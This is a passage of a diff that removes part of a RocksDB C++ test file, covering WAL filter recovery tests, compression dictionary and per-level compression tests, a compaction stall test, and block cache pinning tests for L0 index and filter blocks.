-      // found.
-      for (size_t i = 0; i < batch_keys.size(); i++) {
-        for (size_t j = 0; j < batch_keys[i].size(); j++) {
-          if (i >= apply_option_for_record_index) {
-            keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-          }
-          else {
-            keys_must_exist.push_back(Slice(batch_keys[i][j]));
-          }
-        }
-      }
-      break;
-    }
-    default:
-      assert(false);  // unhandled case
-    }
-
-    bool checked_after_reopen = false;
-
-    while (true) {
-      // Ensure that expected keys exists
-      // and not expected keys don't exist after recovery
-      ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-
-      if (checked_after_reopen) {
-        break;
-      }
-
-      // reopen database again to make sure previous log(s) are not used
-      //(even if they were skipped)
-      // reopn database with option to use WAL filter
-      options = OptionsForLogIterTest();
-      ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-      checked_after_reopen = true;
-    }
-  }
-}
-
-TEST_F(DBTest2, WalFilterTestWithChangeBatch) {
-  class ChangeBatchHandler : public WriteBatch::Handler {
-  private:
-    // Batch to insert keys in
-    WriteBatch* new_write_batch_;
-    // Number of keys to add in the new batch
-    size_t num_keys_to_add_in_new_batch_;
-    // Number of keys added to new batch
-    size_t num_keys_added_;
-
-  public:
-    ChangeBatchHandler(WriteBatch* new_write_batch,
-      size_t num_keys_to_add_in_new_batch)
-      : new_write_batch_(new_write_batch),
-      num_keys_to_add_in_new_batch_(num_keys_to_add_in_new_batch),
-      num_keys_added_(0) {}
-    virtual void Put(const Slice& key, const Slice& value) override {
-      if (num_keys_added_ < num_keys_to_add_in_new_batch_) {
-        new_write_batch_->Put(key, value);
-        ++num_keys_added_;
-      }
-    }
-  };
-
-  class TestWalFilterWithChangeBatch : public WalFilter {
-  private:
-    // Index at which to start changing records
-    size_t change_records_from_index_;
-    // Number of keys to add in the new batch
-    size_t num_keys_to_add_in_new_batch_;
-    // Current record index, incremented with each record encountered.
-    size_t current_record_index_;
-
-  public:
-    TestWalFilterWithChangeBatch(size_t change_records_from_index,
-      size_t num_keys_to_add_in_new_batch)
-      : change_records_from_index_(change_records_from_index),
-      num_keys_to_add_in_new_batch_(num_keys_to_add_in_new_batch),
-      current_record_index_(0) {}
-
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      if (current_record_index_ >= change_records_from_index_) {
-        ChangeBatchHandler handler(new_batch, num_keys_to_add_in_new_batch_);
-        batch.Iterate(&handler);
-        *batch_changed = true;
-      }
-
-      // Filter is passed as a const object for RocksDB to not modify the
-      // object, however we modify it for our own purpose here and hence
-      // cast the constness away.
-      (const_cast<TestWalFilterWithChangeBatch*>(this)
-        ->current_record_index_)++;
-
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "TestWalFilterWithChangeBatch";
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // Create a test filter that would apply wal_processing_option at the first
-  // record
-  size_t change_records_from_index = 1;
-  size_t num_keys_to_add_in_new_batch = 1;
-  TestWalFilterWithChangeBatch test_wal_filter_with_change_batch(
-    change_records_from_index, num_keys_to_add_in_new_batch);
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_with_change_batch;
-  ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-  // Ensure that all keys exist before change_records_from_index_
-  // And after that index only single key exists
-  // as our filter adds only single key for each batch
-  std::vector<Slice> keys_must_exist;
-  std::vector<Slice> keys_must_not_exist;
-
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      if (i >= change_records_from_index && j >= num_keys_to_add_in_new_batch) {
-        keys_must_not_exist.push_back(Slice(batch_keys[i][j]));
-      }
-      else {
-        keys_must_exist.push_back(Slice(batch_keys[i][j]));
-      }
-    }
-  }
-
-  bool checked_after_reopen = false;
-
-  while (true) {
-    // Ensure that expected keys exists
-    // and not expected keys don't exist after recovery
-    ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-
-    if (checked_after_reopen) {
-      break;
-    }
-
-    // reopen database again to make sure previous log(s) are not used
-    //(even if they were skipped)
-    // reopn database with option to use WAL filter
-    options = OptionsForLogIterTest();
-    ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-    checked_after_reopen = true;
-  }
-}
-
-TEST_F(DBTest2, WalFilterTestWithChangeBatchExtraKeys) {
-  class TestWalFilterWithChangeBatchAddExtraKeys : public WalFilter {
-  public:
-    virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) const override {
-      *new_batch = batch;
-      new_batch->Put("key_extra", "value_extra");
-      *batch_changed = true;
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "WalFilterTestWithChangeBatchExtraKeys";
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys(3);
-
-  batch_keys[0].push_back("key1");
-  batch_keys[0].push_back("key2");
-  batch_keys[1].push_back("key3");
-  batch_keys[1].push_back("key4");
-  batch_keys[2].push_back("key5");
-  batch_keys[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // Create a test filter that would add extra keys
-  TestWalFilterWithChangeBatchAddExtraKeys test_wal_filter_extra_keys;
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_extra_keys;
-  Status status = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(status.IsNotSupported());
-
-  // Reopen without filter, now reopen should succeed - previous
-  // attempt to open must not have altered the db.
-  options = OptionsForLogIterTest();
-  ReopenWithColumnFamilies({ "default", "pikachu" }, options);
-
-  std::vector<Slice> keys_must_exist;
-  std::vector<Slice> keys_must_not_exist;  // empty vector
-
-  for (size_t i = 0; i < batch_keys.size(); i++) {
-    for (size_t j = 0; j < batch_keys[i].size(); j++) {
-      keys_must_exist.push_back(Slice(batch_keys[i][j]));
-    }
-  }
-
-  ValidateKeyExistence(db_, keys_must_exist, keys_must_not_exist);
-}
-
-TEST_F(DBTest2, WalFilterTestWithColumnFamilies) {
-  class TestWalFilterWithColumnFamilies : public WalFilter {
-  private:
-    // column_family_id -> log_number map (provided to WALFilter)
-    std::map<uint32_t, uint64_t> cf_log_number_map_;
-    // column_family_name -> column_family_id map (provided to WALFilter)
-    std::map<std::string, uint32_t> cf_name_id_map_;
-    // column_family_name -> keys_found_in_wal map
-    // We store keys that are applicable to the column_family
-    // during recovery (i.e. aren't already flushed to SST file(s))
-    // for verification against the keys we expect.
-    std::map<uint32_t, std::vector<std::string>> cf_wal_keys_;
-  public:
-    virtual void ColumnFamilyLogNumberMap(
-      const std::map<uint32_t, uint64_t>& cf_lognumber_map,
-      const std::map<std::string, uint32_t>& cf_name_id_map) override {
-      cf_log_number_map_ = cf_lognumber_map;
-      cf_name_id_map_ = cf_name_id_map;
-    }
-
-    virtual WalProcessingOption LogRecordFound(unsigned long long log_number,
-      const std::string& log_file_name,
-      const WriteBatch& batch,
-      WriteBatch* new_batch,
-      bool* batch_changed) override {
-      class LogRecordBatchHandler : public WriteBatch::Handler {
-      private:
-        const std::map<uint32_t, uint64_t> & cf_log_number_map_;
-        std::map<uint32_t, std::vector<std::string>> & cf_wal_keys_;
-        unsigned long long log_number_;
-      public:
-        LogRecordBatchHandler(unsigned long long current_log_number,
-          const std::map<uint32_t, uint64_t> & cf_log_number_map,
-          std::map<uint32_t, std::vector<std::string>> & cf_wal_keys) :
-          cf_log_number_map_(cf_log_number_map),
-          cf_wal_keys_(cf_wal_keys),
-          log_number_(current_log_number){}
-
-        virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-          const Slice& /*value*/) override {
-          auto it = cf_log_number_map_.find(column_family_id);
-          assert(it != cf_log_number_map_.end());
-          unsigned long long log_number_for_cf = it->second;
-          // If the current record is applicable for column_family_id
-          // (i.e. isn't flushed to SST file(s) for column_family_id)
-          // add it to the cf_wal_keys_ map for verification.
-          if (log_number_ >= log_number_for_cf) {
-            cf_wal_keys_[column_family_id].push_back(std::string(key.data(),
-              key.size()));
-          }
-          return Status::OK();
-        }
-      } handler(log_number, cf_log_number_map_, cf_wal_keys_);
-
-      batch.Iterate(&handler);
-
-      return WalProcessingOption::kContinueProcessing;
-    }
-
-    virtual const char* Name() const override {
-      return "WalFilterTestWithColumnFamilies";
-    }
-
-    const std::map<uint32_t, std::vector<std::string>>& GetColumnFamilyKeys() {
-      return cf_wal_keys_;
-    }
-
-    const std::map<std::string, uint32_t> & GetColumnFamilyNameIdMap() {
-      return cf_name_id_map_;
-    }
-  };
-
-  std::vector<std::vector<std::string>> batch_keys_pre_flush(3);
-
-  batch_keys_pre_flush[0].push_back("key1");
-  batch_keys_pre_flush[0].push_back("key2");
-  batch_keys_pre_flush[1].push_back("key3");
-  batch_keys_pre_flush[1].push_back("key4");
-  batch_keys_pre_flush[2].push_back("key5");
-  batch_keys_pre_flush[2].push_back("key6");
-
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({ "pikachu" }, options);
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys_pre_flush.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys_pre_flush[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys_pre_flush[i][j], DummyString(1024));
-      batch.Put(handles_[1], batch_keys_pre_flush[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  //Flush default column-family
-  db_->Flush(FlushOptions(), handles_[0]);
-
-  // Do some more writes
-  std::vector<std::vector<std::string>> batch_keys_post_flush(3);
-
-  batch_keys_post_flush[0].push_back("key7");
-  batch_keys_post_flush[0].push_back("key8");
-  batch_keys_post_flush[1].push_back("key9");
-  batch_keys_post_flush[1].push_back("key10");
-  batch_keys_post_flush[2].push_back("key11");
-  batch_keys_post_flush[2].push_back("key12");
-
-  // Write given keys in given batches
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      batch.Put(handles_[0], batch_keys_post_flush[i][j], DummyString(1024));
-      batch.Put(handles_[1], batch_keys_post_flush[i][j], DummyString(1024));
-    }
-    dbfull()->Write(WriteOptions(), &batch);
-  }
-
-  // On Recovery we should only find the second batch applicable to default CF
-  // But both batches applicable to pikachu CF
-
-  // Create a test filter that would add extra keys
-  TestWalFilterWithColumnFamilies test_wal_filter_column_families;
-
-  // Reopen database with option to use WAL filter
-  options = OptionsForLogIterTest();
-  options.wal_filter = &test_wal_filter_column_families;
-  Status status =
-    TryReopenWithColumnFamilies({ "default", "pikachu" }, options);
-  ASSERT_TRUE(status.ok());
-
-  // verify that handles_[0] only has post_flush keys
-  // while handles_[1] has pre and post flush keys
-  auto cf_wal_keys = test_wal_filter_column_families.GetColumnFamilyKeys();
-  auto name_id_map = test_wal_filter_column_families.GetColumnFamilyNameIdMap();
-  size_t index = 0;
-  auto keys_cf = cf_wal_keys[name_id_map[kDefaultColumnFamilyName]];
-  //default column-family, only post_flush keys are expected
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_post_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-  ASSERT_TRUE(index == keys_cf.size());
-
-  index = 0;
-  keys_cf = cf_wal_keys[name_id_map["pikachu"]];
-  //pikachu column-family, all keys are expected
-  for (size_t i = 0; i < batch_keys_pre_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_pre_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_pre_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-
-  for (size_t i = 0; i < batch_keys_post_flush.size(); i++) {
-    for (size_t j = 0; j < batch_keys_post_flush[i].size(); j++) {
-      Slice key_from_the_log(keys_cf[index++]);
-      Slice batch_key(batch_keys_post_flush[i][j]);
-      ASSERT_TRUE(key_from_the_log.compare(batch_key) == 0);
-    }
-  }
-  ASSERT_TRUE(index == keys_cf.size());
-}
-
-TEST_F(DBTest2, PresetCompressionDict) {
-  const size_t kBlockSizeBytes = 4 << 10;
-  const size_t kL0FileBytes = 128 << 10;
-  const size_t kApproxPerBlockOverheadBytes = 50;
-  const int kNumL0Files = 5;
-
-  Options options;
-  options.env = CurrentOptions().env; // Make sure to use any custom env that the test is configured with.
-  options.allow_concurrent_memtable_write = false;
-  options.arena_block_size = kBlockSizeBytes;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kL0FileBytes / kBlockSizeBytes));
-  options.num_levels = 2;
-  options.target_file_size_base = kL0FileBytes;
-  options.target_file_size_multiplier = 2;
-  options.write_buffer_size = kL0FileBytes;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = kBlockSizeBytes;
-  std::vector<CompressionType> compression_types;
-  if (Zlib_Supported()) {
-    compression_types.push_back(kZlibCompression);
-  }
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  compression_types.push_back(kLZ4Compression);
-  compression_types.push_back(kLZ4HCCompression);
-#endif                          // LZ4_VERSION_NUMBER >= 10400
-  if (ZSTD_Supported()) {
-    compression_types.push_back(kZSTD);
-  }
-
-  for (auto compression_type : compression_types) {
-    options.compression = compression_type;
-    size_t prev_out_bytes;
-    for (int i = 0; i < 2; ++i) {
-      // First iteration: compress without preset dictionary
-      // Second iteration: compress with preset dictionary
-      // To make sure the compression dictionary was actually used, we verify
-      // the compressed size is smaller in the second iteration. Also in the
-      // second iteration, verify the data we get out is the same data we put
-      // in.
-      if (i) {
-        options.compression_opts.max_dict_bytes = kBlockSizeBytes;
-      } else {
-        options.compression_opts.max_dict_bytes = 0;
-      }
-
-      options.statistics = rocksdb::CreateDBStatistics();
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      CreateAndReopenWithCF({"pikachu"}, options);
-      Random rnd(301);
-      std::string seq_data =
-          RandomString(&rnd, kBlockSizeBytes - kApproxPerBlockOverheadBytes);
-
-      ASSERT_EQ(0, NumTableFilesAtLevel(0, 1));
-      for (int j = 0; j < kNumL0Files; ++j) {
-        for (size_t k = 0; k < kL0FileBytes / kBlockSizeBytes + 1; ++k) {
-          ASSERT_OK(Put(1, Key(static_cast<int>(
-                               j * (kL0FileBytes / kBlockSizeBytes) + k)),
-                        seq_data));
-        }
-        dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-        ASSERT_EQ(j + 1, NumTableFilesAtLevel(0, 1));
-      }
-      db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-      ASSERT_EQ(0, NumTableFilesAtLevel(0, 1));
-      ASSERT_GT(NumTableFilesAtLevel(1, 1), 0);
-
-      size_t out_bytes = 0;
-      std::vector<std::string> files;
-      GetSstFiles(dbname_, &files);
-      for (const auto& file : files) {
-        uint64_t curr_bytes;
-        env_->GetFileSize(dbname_ + "/" + file, &curr_bytes);
-        out_bytes += static_cast<size_t>(curr_bytes);
-      }
-
-      for (size_t j = 0; j < kNumL0Files * (kL0FileBytes / kBlockSizeBytes);
-           j++) {
-        ASSERT_EQ(seq_data, Get(1, Key(static_cast<int>(j))));
-      }
-      if (i) {
-        ASSERT_GT(prev_out_bytes, out_bytes);
-      }
-      prev_out_bytes = out_bytes;
-      DestroyAndReopen(options);
-    }
-  }
-}
-
-class CompactionCompressionListener : public EventListener {
- public:
-  explicit CompactionCompressionListener(Options* db_options)
-      : db_options_(db_options) {}
-
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    // Figure out last level with files
-    int bottommost_level = 0;
-    for (int level = 0; level < db->NumberLevels(); level++) {
-      std::string files_at_level;
-      ASSERT_TRUE(
-          db->GetProperty("rocksdb.num-files-at-level" + NumberToString(level),
-                          &files_at_level));
-      if (files_at_level != "0") {
-        bottommost_level = level;
-      }
-    }
-
-    if (db_options_->bottommost_compression != kDisableCompressionOption &&
-        ci.output_level == bottommost_level && ci.output_level >= 2) {
-      ASSERT_EQ(ci.compression, db_options_->bottommost_compression);
-    } else if (db_options_->compression_per_level.size() != 0) {
-      ASSERT_EQ(ci.compression,
-                db_options_->compression_per_level[ci.output_level]);
-    } else {
-      ASSERT_EQ(ci.compression, db_options_->compression);
-    }
-    max_level_checked = std::max(max_level_checked, ci.output_level);
-  }
-
-  int max_level_checked = 0;
-  const Options* db_options_;
-};
-
-TEST_F(DBTest2, CompressionOptions) {
-  if (!Zlib_Supported() || !Snappy_Supported()) {
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 2;
-  options.max_bytes_for_level_base = 100;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 7;
-  options.max_background_compactions = 1;
-
-  CompactionCompressionListener* listener =
-      new CompactionCompressionListener(&options);
-  options.listeners.emplace_back(listener);
-
-  const int kKeySize = 5;
-  const int kValSize = 20;
-  Random rnd(301);
-
-  for (int iter = 0; iter <= 2; iter++) {
-    listener->max_level_checked = 0;
-
-    if (iter == 0) {
-      // Use different compression algorithms for different levels but
-      // always use Zlib for bottommost level
-      options.compression_per_level = {kNoCompression,     kNoCompression,
-                                       kNoCompression,     kSnappyCompression,
-                                       kSnappyCompression, kSnappyCompression,
-                                       kZlibCompression};
-      options.compression = kNoCompression;
-      options.bottommost_compression = kZlibCompression;
-    } else if (iter == 1) {
-      // Use Snappy except for bottommost level use ZLib
-      options.compression_per_level = {};
-      options.compression = kSnappyCompression;
-      options.bottommost_compression = kZlibCompression;
-    } else if (iter == 2) {
-      // Use Snappy everywhere
-      options.compression_per_level = {};
-      options.compression = kSnappyCompression;
-      options.bottommost_compression = kDisableCompressionOption;
-    }
-
-    DestroyAndReopen(options);
-    // Write 10 random files
-    for (int i = 0; i < 10; i++) {
-      for (int j = 0; j < 5; j++) {
-        ASSERT_OK(
-            Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValSize)));
-      }
-      ASSERT_OK(Flush());
-      dbfull()->TEST_WaitForCompact();
-    }
-
-    // Make sure that we wrote enough to check all 7 levels
-    ASSERT_EQ(listener->max_level_checked, 6);
-  }
-}
-
-class CompactionStallTestListener : public EventListener {
- public:
-  CompactionStallTestListener() : compacted_files_cnt_(0) {}
-
-  void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override {
-    ASSERT_EQ(ci.cf_name, "default");
-    ASSERT_EQ(ci.base_input_level, 0);
-    ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum);
-    compacted_files_cnt_ += ci.input_files.size();
-  }
-  std::atomic<size_t> compacted_files_cnt_;
-};
-
-TEST_F(DBTest2, CompactionStall) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkCompaction", "DBTest2::CompactionStall:0"},
-       {"DBImpl::BGWorkCompaction", "DBTest2::CompactionStall:1"},
-       {"DBTest2::CompactionStall:2",
-        "DBImpl::NotifyOnCompactionCompleted::UnlockMutex"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 4;
-  options.max_background_compactions = 40;
-  CompactionStallTestListener* listener = new CompactionStallTestListener();
-  options.listeners.emplace_back(listener);
-  DestroyAndReopen(options);
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  Random rnd(301);
-
-  // 4 Files in L0
-  for (int i = 0; i < 4; i++) {
-    for (int j = 0; j < 10; j++) {
-      ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for compaction to be triggered
-  TEST_SYNC_POINT("DBTest2::CompactionStall:0");
-
-  // Clear "DBImpl::BGWorkCompaction" SYNC_POINT since we want to hold it again
-  // at DBTest2::CompactionStall::1
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Another 6 L0 files to trigger compaction again
-  for (int i = 0; i < 6; i++) {
-    for (int j = 0; j < 10; j++) {
-      ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for another compaction to be triggered
-  TEST_SYNC_POINT("DBTest2::CompactionStall:1");
-
-  // Hold NotifyOnCompactionCompleted in the unlock mutex section
-  TEST_SYNC_POINT("DBTest2::CompactionStall:2");
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_LT(NumTableFilesAtLevel(0),
-            options.level0_file_num_compaction_trigger);
-  ASSERT_GT(listener->compacted_files_cnt_.load(),
-            10 - options.level0_file_num_compaction_trigger);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest2, FirstSnapshotTest) {
-  Options options;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // This snapshot will have sequence number 0 what is expected behaviour.
-  const Snapshot* s1 = db_->GetSnapshot();
-
-  Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-  Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-
-  db_->ReleaseSnapshot(s1);
-}
-
-class PinL0IndexAndFilterBlocksTest : public DBTestBase,
-                                      public testing::WithParamInterface<bool> {
- public:
-  PinL0IndexAndFilterBlocksTest() : DBTestBase("/db_pin_l0_index_bloom_test") {}
-  virtual void SetUp() override { infinite_max_files_ = GetParam(); }
-
-  void CreateTwoLevels(Options* options, bool close_afterwards) {
-    if (infinite_max_files_) {
-      options->max_open_files = -1;
-    }
-    options->create_if_missing = true;
-    options->statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    table_options.cache_index_and_filter_blocks = true;
-    table_options.pin_l0_filter_and_index_blocks_in_cache = true;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-    options->table_factory.reset(new BlockBasedTableFactory(table_options));
-    CreateAndReopenWithCF({"pikachu"}, *options);
-
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    // move this table to L1
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-
-    // reset block cache
-    table_options.block_cache = NewLRUCache(64 * 1024);
-    options->table_factory.reset(NewBlockBasedTableFactory(table_options));
-    TryReopenWithColumnFamilies({"default", "pikachu"}, *options);
-    // create new table at L0
-    Put(1, "a2", "begin2");
-    Put(1, "z2", "end2");
-    ASSERT_OK(Flush(1));
-
-    if (close_afterwards) {
-      Close();  // This ensures that there is no ref to block cache entries
-    }
-    table_options.block_cache->EraseUnRefEntries();
-  }
-
-  bool infinite_max_files_;
-};
-
-TEST_P(PinL0IndexAndFilterBlocksTest,
-       IndexAndFilterBlocksOfNewTableAddedToCacheWithPinning) {
-  Options options = CurrentOptions();
-  if (infinite_max_files_) {
-    options.max_open_files = -1;
-  }
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.cache_index_and_filter_blocks = true;
-  table_options.pin_l0_filter_and_index_blocks_in_cache = true;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(20));
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "key", "val"));
-  // Create a new table.
-  ASSERT_OK(Flush(1));
-
-  // index/filter blocks added to block cache right after table creation.
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // only index/filter were added
-  ASSERT_EQ(2, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_DATA_MISS));
-
-  std::string value;
-  // Miss and hit count should remain the same, they're all pinned.
-  db_->KeyMayExist(ReadOptions(), handles_[1], "key", &value);
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // Miss and hit count should remain the same, they're all pinned.
-  value = Get(1, "key");
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(0, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-}
-
-TEST_P(PinL0IndexAndFilterBlocksTest,
-       MultiLevelIndexAndFilterBlocksCachedWithPinning) {
-  Options options = CurrentOptions();
-  PinL0IndexAndFilterBlocksTest::CreateTwoLevels(&options, false);
-  // get base cache values
-  uint64_t fm = TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  uint64_t fh = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  uint64_t im = TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS);
-  uint64_t ih = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-
-  std::string value;
-  // this should be read from L0
-  // so cache values don't change
-  value = Get(1, "a2");
-  ASSERT_EQ(fm, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-  ASSERT_EQ(im, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-  ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-
-  // this should be read from L1
-  // the file is opened, prefetching results in a cache filter miss
-  // the block is loaded and added to the cache,
-  // then the get results in a cache hit for L1
-  // When we have inifinite max_files, there is still cache miss because we have
-  // reset the block cache
-  value = Get(1, "a");
-  ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-  ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-}
-
-TEST_P(PinL0IndexAndFilterBlocksTest, DisablePrefetchingNonL0IndexAndFilter) {
-  Options options = CurrentOptions();
-  // This ensures that db does not ref anything in the block cache, so
-  // EraseUnRefEntries could clear them up.
-  bool close_afterwards = true;
-  PinL0IndexAndFilterBlocksTest::CreateTwoLevels(&options, close_afterwards);
-
-  // Get base cache values
-  uint64_t fm = TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS);
-  uint64_t fh = TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT);
-  uint64_t im = TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS);
-  uint64_t ih = TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT);
-
-  // Reopen database. If max_open_files is set as -1, table readers will be
-  // preloaded. This will trigger a BlockBasedTable::Open() and prefetch
-  // L0 index and filter. Level 1's prefetching is disabled in DB::Open()
-  TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  if (infinite_max_files_) {
-    // After reopen, cache miss are increased by one because we read (and only
-    // read) filter and index on L0
-    ASSERT_EQ(fm + 1, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
-    ASSERT_EQ(fh, TestGetTickerCount(options, BLOCK_CACHE_FILTER_HIT));
-    ASSERT_EQ(im + 1, TestGetTickerCount(options, BLOCK_CACHE_INDEX_MISS));
-    ASSERT_EQ(ih, TestGetTickerCount(options, BLOCK_CACHE_INDEX_HIT));
-  } else {
-    // If max_open_files is not -1, we do not preload table readers, so there is
-    // no change.
-    ASSERT_EQ(fm, TestGetTickerCount(options, BLOCK_CACHE_FILTER_MISS));
